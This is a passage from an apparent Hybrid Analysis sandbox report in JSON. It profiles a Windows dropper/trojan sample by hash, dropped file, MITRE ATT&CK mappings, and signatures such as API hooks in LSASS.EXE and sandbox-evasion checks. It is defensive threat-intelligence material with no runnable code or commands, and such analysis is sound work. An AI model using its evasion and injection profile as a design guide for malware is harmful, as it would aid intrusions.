"https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc
https://hybrid-analysis.com/sample/0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc
Hybrid Analysis - Killers
{"size": 663552, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc", "sha256": "0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc", "av_detect": 93, "vx_family": "Dropper.Generic.Dacic.3035", "threat_score": 72, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 117, "extracted_files": [{"name": "gegdsimsogm.exe", "file_path": "%TEMP%\\gegdsimsogm.exe", "file_size": 327680, "sha256": "c8c542ac3f6526d1501c2b9d6262bfa029a1ac0d9dd6b3c1965977abdd8bd126", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe (PID: 5952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "1 .RES Files linked with CVTRES.EXE 7.10 (Visual Studio .NET 2003) (build: 3052)", "3 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["3 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "12 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)", "40 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "1 .OBJ Files linked with ALIASOBJ.EXE 7.10 BETA (Internal OLDNAMES.LIB Tool) (build: 2067)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (3 files)"], "total_file_compositions_imports": 68}, "processes": [{"uid": "00000000-00005952", "name": "0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe", "normalized_path": "C:\\0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe", "sha256": "0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc", "av_label": "Trojan.Chydo", "av_matched": 18, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"300122795357,6028,3140,,CreateProcessW,kernel32.dll,\"252:04:44.616\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Skype\\Phone\" in Source: 00000000-00000336.00000000.74072.0042A000.00000002.mdmp\n \"REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers\" in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00005952.00000003.75415.001C0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pctfjohcnupctfjohcnupctfjo\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"pctfjohcnupctfjohcnupctfjo\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"WSAGetLastError\" (Indicator: \"GetLastError\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetHandleCount\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetSystemInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"lstrcpynA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"Process32First\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"SetErrorMode\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: 